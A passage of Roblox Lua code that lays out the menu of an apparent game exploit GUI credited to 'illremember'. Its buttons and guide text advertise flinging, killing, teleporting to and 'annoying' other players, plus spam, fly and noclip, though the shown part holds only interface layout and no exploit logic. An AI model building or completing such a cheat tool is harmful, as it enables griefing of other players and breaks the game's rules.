= "" EnterUsername.TextScaled = true EnterUsername.TextSize = 14 EnterUsername.TextWrapped = true CloseGUI.Name = "CloseGUI" CloseGUI.Parent = TopFrame CloseGUI.BackgroundColor3 = Color3.new(1, 1, 1) CloseGUI.BackgroundTransparency = 1 CloseGUI.Position = UDim2.new(0.913618803, 0, 0, 0) CloseGUI.Size = UDim2.new(0, 40, 0, 40) CloseGUI.ZIndex = 10 CloseGUI.Font = Enum.Font.SourceSansBold CloseGUI.FontSize = Enum.FontSize.Size60 CloseGUI.Text = "X" CloseGUI.TextColor3 = Color3.new(1, 0.631373, 0.109804) CloseGUI.TextSize = 50 CloseGUI.TextWrapped = true CreditTXT.Name = "CreditTXT" CreditTXT.Parent = TopFrame CreditTXT.BackgroundColor3 = Color3.new(1, 1, 1) CreditTXT.BackgroundTransparency = 1 CreditTXT.Position = UDim2.new(0.690784931, 0, 0.250416666, 0) CreditTXT.Rotation = -17 CreditTXT.Size = UDim2.new(0, 90, 0, 20) CreditTXT.ZIndex = 10 CreditTXT.Font = Enum.Font.SourceSansItalic CreditTXT.FontSize = Enum.FontSize.Size24 CreditTXT.Text = "illremember" CreditTXT.TextColor3 = Color3.new(0.933333, 0.819608, 0.737255) CreditTXT.TextSize = 20 CreditTXT.TextWrapped = true Sections.Name = "Sections" Sections.Parent = MainFrame Sections.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) Sections.BackgroundTransparency = 1 Sections.BorderColor3 = Color3.new(0.121569, 0.121569, 0.121569) Sections.BorderSizePixel = 2 Sections.Position = UDim2.new(0, 0, 0.148395061, 0) Sections.Size = UDim2.new(0, 350, 0, 230) INTRO.Name = "INTRO" INTRO.Parent = Sections INTRO.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) INTRO.BorderColor3 = Color3.new(0.121569, 0.121569, 0.121569) INTRO.BorderSizePixel = 2 INTRO.Size = UDim2.new(0, 350, 0, 230) FE_CHECK.Name = "FE_CHECK" FE_CHECK.Parent = INTRO FE_CHECK.BackgroundColor3 = Color3.new(1, 1, 1) FE_CHECK.BackgroundTransparency = 1 FE_CHECK.Position = UDim2.new(0.0286500659, 0, 0.0435507223, 0) FE_CHECK.Size = UDim2.new(0, 332, 0, 50) FE_CHECK.Font = Enum.Font.ArialBold FE_CHECK.FontSize = Enum.FontSize.Size14 FE_CHECK.Text = "Error loading FE Checker" FE_CHECK.TextScaled = true FE_CHECK.TextSize = 14 FE_CHECK.TextWrapped = true Guide1.Name = "Guide1" Guide1.Parent = INTRO Guide1.BackgroundColor3 = Color3.new(1, 1, 1) Guide1.BackgroundTransparency = 1 Guide1.Position = UDim2.new(0.0286500659, 0, 0.653260887, 0) Guide1.Size = UDim2.new(0, 332, 0, 80) Guide1.Font = Enum.Font.ArialBold Guide1.FontSize = Enum.FontSize.Size14 Guide1.Text = "Click on one of the sections to the left to begin exploiting FE Sections! Enter a name in the textbox (top left) to affect that player. You don't have to write their full username." Guide1.TextScaled = true Guide1.TextSize = 14 Guide1.TextStrokeColor3 = Color3.new(0.831373, 0.831373, 0.831373) Guide1.TextStrokeTransparency = 0.5 Guide1.TextWrapped = true Guide2.Name = "Guide2" Guide2.Parent = INTRO Guide2.BackgroundColor3 = Color3.new(1, 1, 1) Guide2.BackgroundTransparency = 1 Guide2.Position = UDim2.new(0.0286500659, 0, 0.217753619, 0) Guide2.Size = UDim2.new(0, 332, 0, 50) Guide2.Font = Enum.Font.ArialBold Guide2.FontSize = Enum.FontSize.Size14 Guide2.Text = "This GUI is dedicated to exploiting FE Sections, affecting yourself and others" Guide2.TextScaled = true Guide2.TextSize = 14 Guide2.TextStrokeColor3 = Color3.new(1, 0.658824, 0.0666667) Guide2.TextStrokeTransparency = 0 Guide2.TextWrapped = true Credit.Name = "Credit" Credit.Parent = INTRO Credit.BackgroundColor3 = Color3.new(1, 1, 1) Credit.BackgroundTransparency = 1 Credit.Position = UDim2.new(0.0286500659, 0, 0.435507238, 0) Credit.Size = UDim2.new(0, 332, 0, 50) Credit.Font = Enum.Font.ArialBold Credit.FontSize = Enum.FontSize.Size14 Credit.Text = "By illremember" Credit.TextColor3 = Color3.new(0.92549, 0.607843, 0.0901961) Credit.TextScaled = true Credit.TextSize = 14 Credit.TextStrokeColor3 = Color3.new(1, 0.658824, 0.0666667) Credit.TextWrapped = true RocketPropulsion.Name = "RocketPropulsion" RocketPropulsion.Parent = Sections RocketPropulsion.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) RocketPropulsion.BorderColor3 = Color3.new(0.121569, 0.121569, 0.121569) RocketPropulsion.BorderSizePixel = 2 RocketPropulsion.Size = UDim2.new(0, 350, 0, 230) RocketPropulsion.Visible = false ROCKETPROPULSIONGUIDE.Name = "ROCKETPROPULSIONGUIDE" ROCKETPROPULSIONGUIDE.Parent = RocketPropulsion ROCKETPROPULSIONGUIDE.BackgroundColor3 = Color3.new(1, 1, 1) ROCKETPROPULSIONGUIDE.BackgroundTransparency = 1 ROCKETPROPULSIONGUIDE.Position = UDim2.new(0.0286500659, 0, 0.0435507223, 0) ROCKETPROPULSIONGUIDE.Size = UDim2.new(0, 332, 0, 35) ROCKETPROPULSIONGUIDE.Font = Enum.Font.ArialBold ROCKETPROPULSIONGUIDE.FontSize = Enum.FontSize.Size14 ROCKETPROPULSIONGUIDE.Text = "Fling and push others, works best in a group of people." ROCKETPROPULSIONGUIDE.TextScaled = true ROCKETPROPULSIONGUIDE.TextSize = 14 ROCKETPROPULSIONGUIDE.TextStrokeColor3 = Color3.new(1, 0.658824, 0.0666667) ROCKETPROPULSIONGUIDE.TextStrokeTransparency = 0 ROCKETPROPULSIONGUIDE.TextWrapped = true Push.Name = "Push" Push.Parent = RocketPropulsion Push.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Push.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Push.Position = UDim2.new(0.0286500659, 0, 0.261304349, 0) Push.Size = UDim2.new(0, 140, 0, 25) Push.Font = Enum.Font.SourceSans Push.FontSize = Enum.FontSize.Size14 Push.Text = "Push" Push.TextScaled = true Push.TextSize = 14 Push.TextWrapped = true Flatten.Name = "Flatten" Flatten.Parent = RocketPropulsion Flatten.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Flatten.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Flatten.Position = UDim2.new(0.54435122, 0, 0.261304349, 0) Flatten.Size = UDim2.new(0, 140, 0, 25) Flatten.Font = Enum.Font.SourceSans Flatten.FontSize = Enum.FontSize.Size14 Flatten.Text = "Flatten" Flatten.TextScaled = true Flatten.TextSize = 14 Flatten.TextWrapped = true Float.Name = "Float" Float.Parent = RocketPropulsion Float.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Float.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Float.Position = UDim2.new(0.54435122, 0, 0.435507238, 0) Float.Size = UDim2.new(0, 140, 0, 25) Float.Font = Enum.Font.SourceSans Float.FontSize = Enum.FontSize.Size14 Float.Text = "Float" Float.TextScaled = true Float.TextSize = 14 Float.TextWrapped = true Max.Name = "Max" Max.Parent = RocketPropulsion Max.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Max.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Max.Position = UDim2.new(0.0286500659, 0, 0.435507238, 0) Max.Size = UDim2.new(0, 140, 0, 25) Max.Font = Enum.Font.SourceSans Max.FontSize = Enum.FontSize.Size14 Max.Text = "Max" Max.TextScaled = true Max.TextSize = 14 Max.TextWrapped = true AimHead.Name = "AimHead" AimHead.Parent = RocketPropulsion AimHead.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) AimHead.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) AimHead.Position = UDim2.new(0.0286500659, 0, 0.609710157, 0) AimHead.Size = UDim2.new(0, 140, 0, 25) AimHead.Font = Enum.Font.SourceSans AimHead.FontSize = Enum.FontSize.Size14 AimHead.Text = "AimHead" AimHead.TextScaled = true AimHead.TextSize = 14 AimHead.TextWrapped = true SlowAttract.Name = "SlowAttract" SlowAttract.Parent = RocketPropulsion SlowAttract.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) SlowAttract.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) SlowAttract.Position = UDim2.new(0.54435122, 0, 0.609710157, 0) SlowAttract.Size = UDim2.new(0, 140, 0, 25) SlowAttract.Font = Enum.Font.SourceSans SlowAttract.FontSize = Enum.FontSize.Size14 SlowAttract.Text = "SlowAttract" SlowAttract.TextScaled = true SlowAttract.TextSize = 14 SlowAttract.TextWrapped = true Experimental.Name = "Experimental" Experimental.Parent = RocketPropulsion Experimental.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Experimental.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Experimental.Position = UDim2.new(0.54435122, 0, 0.783913076, 0) Experimental.Size = UDim2.new(0, 140, 0, 25) Experimental.Font = Enum.Font.SourceSans Experimental.FontSize = Enum.FontSize.Size14 Experimental.Text = "Experimental" Experimental.TextScaled = true Experimental.TextSize = 14 Experimental.TextWrapped = true Multiple.Name = "Multiple" Multiple.Parent = RocketPropulsion Multiple.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Multiple.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Multiple.Position = UDim2.new(0.0286500659, 0, 0.783913076, 0) Multiple.Size = UDim2.new(0, 140, 0, 25) Multiple.Font = Enum.Font.SourceSans Multiple.FontSize = Enum.FontSize.Size14 Multiple.Text = "Multiple" Multiple.TextScaled = true Multiple.TextSize = 14 Multiple.TextWrapped = true Teleportation.Name = "Teleportation" Teleportation.Parent = Sections Teleportation.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) Teleportation.BorderColor3 = Color3.new(0.121569, 0.121569, 0.121569) Teleportation.BorderSizePixel = 2 Teleportation.Size = UDim2.new(0, 350, 0, 230) Teleportation.Visible = false TELEPORTATIONGUIDE.Name = "TELEPORTATIONGUIDE" TELEPORTATIONGUIDE.Parent = Teleportation TELEPORTATIONGUIDE.BackgroundColor3 = Color3.new(1, 1, 1) TELEPORTATIONGUIDE.BackgroundTransparency = 1 TELEPORTATIONGUIDE.Position = UDim2.new(0.0286500659, 0, 0.0435507223, 0) TELEPORTATIONGUIDE.Size = UDim2.new(0, 332, 0, 35) TELEPORTATIONGUIDE.Font = Enum.Font.ArialBold TELEPORTATIONGUIDE.FontSize = Enum.FontSize.Size14 TELEPORTATIONGUIDE.Text = "Teleport to and annoy other players." TELEPORTATIONGUIDE.TextScaled = true TELEPORTATIONGUIDE.TextSize = 14 TELEPORTATIONGUIDE.TextStrokeColor3 = Color3.new(1, 0.658824, 0.0666667) TELEPORTATIONGUIDE.TextStrokeTransparency = 0 TELEPORTATIONGUIDE.TextWrapped = true TeleportTo.Name = "TeleportTo" TeleportTo.Parent = Teleportation TeleportTo.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) TeleportTo.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) TeleportTo.Position = UDim2.new(0.0286500659, 0, 0.261304349, 0) TeleportTo.Size = UDim2.new(0, 140, 0, 25) TeleportTo.Font = Enum.Font.SourceSans TeleportTo.FontSize = Enum.FontSize.Size14 TeleportTo.Text = "Teleport To" TeleportTo.TextScaled = true TeleportTo.TextSize = 14 TeleportTo.TextWrapped = true LockOn.Name = "LockOn" LockOn.Parent = Teleportation LockOn.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) LockOn.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) LockOn.Position = UDim2.new(0.54435122, 0, 0.261304349, 0) LockOn.Size = UDim2.new(0, 140, 0, 25) LockOn.Font = Enum.Font.SourceSans LockOn.FontSize = Enum.FontSize.Size14 LockOn.Text = "Lock On" LockOn.TextScaled = true LockOn.TextSize = 14 LockOn.TextWrapped = true LockArm.Name = "LockArm" LockArm.Parent = Teleportation LockArm.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) LockArm.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) LockArm.Position = UDim2.new(0.54435122, 0, 0.435507238, 0) LockArm.Size = UDim2.new(0, 140, 0, 25) LockArm.Font = Enum.Font.SourceSans LockArm.FontSize = Enum.FontSize.Size14 LockArm.Text = "Lock Arm" LockArm.TextScaled = true LockArm.TextSize = 14 LockArm.TextWrapped = true LockLeg.Name = "LockLeg" LockLeg.Parent = Teleportation LockLeg.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) LockLeg.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) LockLeg.Position = UDim2.new(0.0286500659, 0, 0.435507238, 0) LockLeg.Size = UDim2.new(0, 140, 0, 25) LockLeg.Font = Enum.Font.SourceSans LockLeg.FontSize = Enum.FontSize.Size14 LockLeg.Text = "Lock Leg" LockLeg.TextScaled = true LockLeg.TextSize = 14 LockLeg.TextWrapped = true LockHead.Name = "LockHead" LockHead.Parent = Teleportation LockHead.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) LockHead.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) LockHead.Position = UDim2.new(0.0286500659, 0, 0.609710157, 0) LockHead.Size = UDim2.new(0, 140, 0, 25) LockHead.Font = Enum.Font.SourceSans LockHead.FontSize = Enum.FontSize.Size14 LockHead.Text = "LockHead" LockHead.TextScaled = true LockHead.TextSize = 14 LockHead.TextWrapped = true LockMax.Name = "LockMax" LockMax.Parent = Teleportation LockMax.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) LockMax.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) LockMax.Position = UDim2.new(0.54435122, 0, 0.609710157, 0) LockMax.Size = UDim2.new(0, 140, 0, 25) LockMax.Font = Enum.Font.SourceSans LockMax.FontSize = Enum.FontSize.Size14 LockMax.Text = "Lock Max" LockMax.TextScaled = true LockMax.TextSize = 14 LockMax.TextWrapped = true LockAbove.Name = "LockAbove" LockAbove.Parent = Teleportation LockAbove.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) LockAbove.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) LockAbove.Position = UDim2.new(0.54435122, 0, 0.783913076, 0) LockAbove.Size = UDim2.new(0, 140, 0, 25) LockAbove.Font = Enum.Font.SourceSans LockAbove.FontSize = Enum.FontSize.Size14 LockAbove.Text = "Lock Above" LockAbove.TextScaled = true LockAbove.TextSize = 14 LockAbove.TextWrapped = true Trail.Name = "Trail" Trail.Parent = Teleportation Trail.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Trail.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Trail.Position = UDim2.new(0.0286500659, 0, 0.783913076, 0) Trail.Size = UDim2.new(0, 140, 0, 25) Trail.Font = Enum.Font.SourceSans Trail.FontSize = Enum.FontSize.Size14 Trail.Text = "Trail" Trail.TextScaled = true Trail.TextSize = 14 Trail.TextWrapped = true Tools.Name = "Tools" Tools.Parent = Sections Tools.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) Tools.BorderColor3 = Color3.new(0.121569, 0.121569, 0.121569) Tools.BorderSizePixel = 2 Tools.Size = UDim2.new(0, 350, 0, 230) Tools.Visible = false TOOLSGUIDE.Name = "TOOLSGUIDE" TOOLSGUIDE.Parent = Tools TOOLSGUIDE.BackgroundColor3 = Color3.new(1, 1, 1) TOOLSGUIDE.BackgroundTransparency = 1 TOOLSGUIDE.Position = UDim2.new(0.0286500659, 0, 0.0435507223, 0) TOOLSGUIDE.Size = UDim2.new(0, 332, 0, 35) TOOLSGUIDE.Font = Enum.Font.ArialBold TOOLSGUIDE.FontSize = Enum.FontSize.Size14 TOOLSGUIDE.Text = "Do cool commands on others, as long as you have tools in your inventory." TOOLSGUIDE.TextScaled = true TOOLSGUIDE.TextSize = 14 TOOLSGUIDE.TextStrokeColor3 = Color3.new(1, 0.658824, 0.0666667) TOOLSGUIDE.TextStrokeTransparency = 0 TOOLSGUIDE.TextWrapped = true Kill.Name = "Kill" Kill.Parent = Tools Kill.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Kill.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Kill.Position = UDim2.new(0.0286500659, 0, 0.261304349, 0) Kill.Size = UDim2.new(0, 140, 0, 25) Kill.Font = Enum.Font.SourceSans Kill.FontSize = Enum.FontSize.Size14 Kill.Text = "Kill" Kill.TextScaled = true Kill.TextSize = 14 Kill.TextWrapped = true KillSurvive.Name = "KillSurvive" KillSurvive.Parent = Tools KillSurvive.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) KillSurvive.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) KillSurvive.Position = UDim2.new(0.54435122, 0, 0.261304349, 0) KillSurvive.Size = UDim2.new(0, 140, 0, 25) KillSurvive.Font = Enum.Font.SourceSans KillSurvive.FontSize = Enum.FontSize.Size14 KillSurvive.Text = "Kill Survive" KillSurvive.TextScaled = true KillSurvive.TextSize = 14 KillSurvive.TextWrapped = true Attach.Name = "Attach" Attach.Parent = Tools Attach.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Attach.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Attach.Position = UDim2.new(0.54435122, 0, 0.435507238, 0) Attach.Size = UDim2.new(0, 140, 0, 25) Attach.Font = Enum.Font.SourceSans Attach.FontSize = Enum.FontSize.Size14 Attach.Text = "Attach" Attach.TextScaled = true Attach.TextSize = 14 Attach.TextWrapped = true Bring.Name = "Bring" Bring.Parent = Tools Bring.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Bring.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Bring.Position = UDim2.new(0.0286500659, 0, 0.435507238, 0) Bring.Size = UDim2.new(0, 140, 0, 25) Bring.Font = Enum.Font.SourceSans Bring.FontSize = Enum.FontSize.Size14 Bring.Text = "Bring" Bring.TextScaled = true Bring.TextSize = 14 Bring.TextWrapped = true SuperSpin.Name = "SuperSpin" SuperSpin.Parent = Tools SuperSpin.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) SuperSpin.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) SuperSpin.Position = UDim2.new(0.0286500659, 0, 0.609710157, 0) SuperSpin.Size = UDim2.new(0, 140, 0, 25) SuperSpin.Font = Enum.Font.SourceSans SuperSpin.FontSize = Enum.FontSize.Size14 SuperSpin.Text = "Super Spin" SuperSpin.TextScaled = true SuperSpin.TextSize = 14 SuperSpin.TextWrapped = true FreeFall.Name = "FreeFall" FreeFall.Parent = Tools FreeFall.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) FreeFall.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) FreeFall.Position = UDim2.new(0.54435122, 0, 0.609710157, 0) FreeFall.Size = UDim2.new(0, 140, 0, 25) FreeFall.Font = Enum.Font.SourceSans FreeFall.FontSize = Enum.FontSize.Size14 FreeFall.Text = "Free Fall" FreeFall.TextScaled = true FreeFall.TextSize = 14 FreeFall.TextWrapped = true AttachExperimental.Name = "AttachExperimental" AttachExperimental.Parent = Tools AttachExperimental.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) AttachExperimental.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) AttachExperimental.Position = UDim2.new(0.54435122, 0, 0.783913076, 0) AttachExperimental.Size = UDim2.new(0, 140, 0, 25) AttachExperimental.Font = Enum.Font.SourceSans AttachExperimental.FontSize = Enum.FontSize.Size14 AttachExperimental.Text = "Attach Experimental" AttachExperimental.TextScaled = true AttachExperimental.TextSize = 14 AttachExperimental.TextWrapped = true GiveTool.Name = "GiveTool" GiveTool.Parent = Tools GiveTool.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) GiveTool.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) GiveTool.Position = UDim2.new(0.0286500659, 0, 0.783913076, 0) GiveTool.Size = UDim2.new(0, 140, 0, 25) GiveTool.Font = Enum.Font.SourceSans GiveTool.FontSize = Enum.FontSize.Size14 GiveTool.Text = "Give Tool" GiveTool.TextScaled = true GiveTool.TextSize = 14 GiveTool.TextWrapped = true Basic.Name = "Basic" Basic.Parent = Sections Basic.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) Basic.BorderColor3 = Color3.new(0.121569, 0.121569, 0.121569) Basic.BorderSizePixel = 2 Basic.Size = UDim2.new(0, 350, 0, 230) Basic.Visible = false BASICGUIDE.Name = "BASICGUIDE" BASICGUIDE.Parent = Basic BASICGUIDE.BackgroundColor3 = Color3.new(1, 1, 1) BASICGUIDE.BackgroundTransparency = 1 BASICGUIDE.Position = UDim2.new(0.0286500659, 0, 0.0435507223, 0) BASICGUIDE.Size = UDim2.new(0, 332, 0, 35) BASICGUIDE.Font = Enum.Font.ArialBold BASICGUIDE.FontSize = Enum.FontSize.Size14 BASICGUIDE.Text = "Change/alter your own player." BASICGUIDE.TextScaled = true BASICGUIDE.TextSize = 14 BASICGUIDE.TextStrokeColor3 = Color3.new(1, 0.658824, 0.0666667) BASICGUIDE.TextStrokeTransparency = 0 BASICGUIDE.TextWrapped = true Speed.Name = "Speed" Speed.Parent = Basic Speed.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Speed.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Speed.Position = UDim2.new(0.0286500659, 0, 0.348405778, 0) Speed.Size = UDim2.new(0, 100, 0, 25) Speed.Font = Enum.Font.SourceSans Speed.FontSize = Enum.FontSize.Size14 Speed.Text = "Speed" Speed.TextScaled = true Speed.TextSize = 14 Speed.TextWrapped = true JumpHeight.Name = "JumpHeight" JumpHeight.Parent = Basic JumpHeight.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) JumpHeight.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) JumpHeight.Position = UDim2.new(0.343800783, 0, 0.348405778, 0) JumpHeight.Size = UDim2.new(0, 100, 0, 25) JumpHeight.Font = Enum.Font.SourceSans JumpHeight.FontSize = Enum.FontSize.Size14 JumpHeight.Text = "JumpHeight" JumpHeight.TextScaled = true JumpHeight.TextSize = 14 JumpHeight.TextWrapped = true Chat.Name = "Chat" Chat.Parent = Basic Chat.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Chat.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Chat.Position = UDim2.new(0.0286500659, 0, 0.653260887, 0) Chat.Size = UDim2.new(0, 140, 0, 25) Chat.Font = Enum.Font.SourceSans Chat.FontSize = Enum.FontSize.Size14 Chat.Text = "Chat" Chat.TextScaled = true Chat.TextSize = 14 Chat.TextWrapped = true Spam.Name = "Spam" Spam.Parent = Basic Spam.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Spam.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Spam.Position = UDim2.new(0.54435122, 0, 0.653260887, 0) Spam.Size = UDim2.new(0, 140, 0, 25) Spam.Font = Enum.Font.SourceSans Spam.FontSize = Enum.FontSize.Size14 Spam.Text = "Spam" Spam.TextScaled = true Spam.TextSize = 14 Spam.TextWrapped = true Fly.Name = "Fly" Fly.Parent = Basic Fly.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Fly.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Fly.Position = UDim2.new(0.54435122, 0, 0.827463746, 0) Fly.Size = UDim2.new(0, 140, 0, 25) Fly.Font = Enum.Font.SourceSans Fly.FontSize = Enum.FontSize.Size14 Fly.Text = "Fly" Fly.TextScaled = true Fly.TextSize = 14 Fly.TextWrapped = true Noclip.Name = "Noclip" Noclip.Parent = Basic Noclip.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Noclip.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Noclip.Position = UDim2.new(0.0286500659, 0, 0.827463746, 0) Noclip.Size = UDim2.new(0, 140, 0, 25) Noclip.Font = Enum.Font.SourceSans Noclip.FontSize = Enum.FontSize.Size14 Noclip.Text = "Noclip" Noclip.TextScaled = true Noclip.TextSize = 14 Noclip.TextWrapped = true HipHeight.Name = "HipHeight" HipHeight.Parent = Basic HipHeight.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) HipHeight.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) HipHeight.Position = UDim2.new(0.658951521, 0, 0.348405778, 0) HipHeight.Size = UDim2.new(0, 100, 0, 25) HipHeight.Font = Enum.Font.SourceSans HipHeight.FontSize = Enum.FontSize.Size14 HipHeight.Text = "HipHeight" HipHeight.TextScaled = true HipHeight.TextSize = 14 HipHeight.TextWrapped = true STATCHANGE.Name = "STATCHANGE" STATCHANGE.Parent = Basic STATCHANGE.BackgroundColor3 = Color3.new(1, 1, 1) STATCHANGE.BorderColor3 = Color3.new(0.968628, 0.698039, 0.0588235) STATCHANGE.BorderSizePixel = 2 STATCHANGE.Position = UDim2.new(0.315150708, 0, 0.217753619, 0) STATCHANGE.Size = UDim2.new(0, 120, 0, 18) STATCHANGE.ZIndex = 3 STATCHANGE.Font = Enum.Font.SourceSans STATCHANGE.FontSize = Enum.FontSize.Size14 STATCHANGE.Text = "" STATCHANGE.TextScaled = true STATCHANGE.TextSize = 14 STATCHANGE.TextWrapped = true CHATBOX.Name = "CHATBOX" CHATBOX.Parent = Basic CHATBOX.BackgroundColor3 = Color3.new(1, 1, 1) CHATBOX.BorderColor3 = Color3.new(0.968628, 0.698039, 0.0588235) CHATBOX.BorderSizePixel = 2 CHATBOX.Position = UDim2.new(0.143250331, 0, 0.522608697, 0) CHATBOX.Size = UDim2.new(0, 240, 0, 18) CHATBOX.ZIndex = 3 CHATBOX.Font = Enum.Font.SourceSans CHATBOX.FontSize = Enum.FontSize.Size14 CHATBOX.Text = "" CHATBOX.TextScaled = true CHATBOX.TextSize = 14 CHATBOX.TextWrapped = true Local_Player.Name = "Local_Player" Local_Player.Parent = Sections Local_Player.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) Local_Player.BorderColor3 = Color3.new(0.121569, 0.121569, 0.121569) Local_Player.BorderSizePixel = 2 Local_Player.Size = UDim2.new(0, 350, 0, 230) Local_Player.Visible = false Local_PlayerGUIDE.Name = "Local_PlayerGUIDE" Local_PlayerGUIDE.Parent = Local_Player Local_PlayerGUIDE.BackgroundColor3 = Color3.new(1, 1, 1) Local_PlayerGUIDE.BackgroundTransparency = 1 Local_PlayerGUIDE.Position = UDim2.new(0.0286500659, 0, 0.0435507223, 0) Local_PlayerGUIDE.Size = UDim2.new(0, 332, 0, 35) Local_PlayerGUIDE.Font = Enum.Font.ArialBold Local_PlayerGUIDE.FontSize = Enum.FontSize.Size14 Local_PlayerGUIDE.Text = "Perform cool tricks on yourself." Local_PlayerGUIDE.TextScaled = true Local_PlayerGUIDE.TextSize = 14 Local_PlayerGUIDE.TextStrokeColor3 = Color3.new(1, 0.658824, 0.0666667) Local_PlayerGUIDE.TextStrokeTransparency = 0 Local_PlayerGUIDE.TextWrapped = true CrazySpin.Name = "CrazySpin" CrazySpin.Parent = Local_Player CrazySpin.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) CrazySpin.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) CrazySpin.Position = UDim2.new(0.0286500659, 0, 0.261304349, 0) CrazySpin.Size = UDim2.new(0, 140, 0, 25) CrazySpin.Font = Enum.Font.SourceSans CrazySpin.FontSize = Enum.FontSize.Size14 CrazySpin.Text = "Crazy Spin" CrazySpin.TextScaled = true CrazySpin.TextSize = 14 CrazySpin.TextWrapped = true CrouchRocket.Name = "CrouchRocket" CrouchRocket.Parent = Local_Player CrouchRocket.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) CrouchRocket.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) CrouchRocket.Position = UDim2.new(0.54435122, 0, 0.261304349, 0) CrouchRocket.Size = UDim2.new(0, 140, 0, 25) CrouchRocket.Font = Enum.Font.SourceSans CrouchRocket.FontSize = Enum.FontSize.Size14 CrouchRocket.Text = "Crouch Rocket" CrouchRocket.TextScaled = true CrouchRocket.TextSize = 14 CrouchRocket.TextWrapped = true Haunted.Name = "Haunted" Haunted.Parent = Local_Player Haunted.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Haunted.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Haunted.Position = UDim2.new(0.54435122, 0, 0.435507238, 0) Haunted.Size = UDim2.new(0, 140, 0, 25) Haunted.Font = Enum.Font.SourceSans Haunted.FontSize = Enum.FontSize.Size14 Haunted.Text = "Haunted" Haunted.TextScaled = true Haunted.TextSize = 14 Haunted.TextWrapped = true CloneIllusion.Name = "CloneIllusion" CloneIllusion.Parent = Local_Player CloneIllusion.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) CloneIllusion.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) CloneIllusion.Position = UDim2.new(0.0286500659, 0, 0.435507238, 0) CloneIllusion.Size = UDim2.new(0, 140, 0, 25) CloneIllusion.Font = Enum.Font.SourceSans CloneIllusion.FontSize = Enum.FontSize.Size14 CloneIllusion.Text = "Clone Illusion" CloneIllusion.TextScaled = true CloneIllusion.TextSize = 14 CloneIllusion.TextWrapped = true Levitate.Name = "Levitate" Levitate.Parent = Local_Player Levitate.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Levitate.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Levitate.Position = 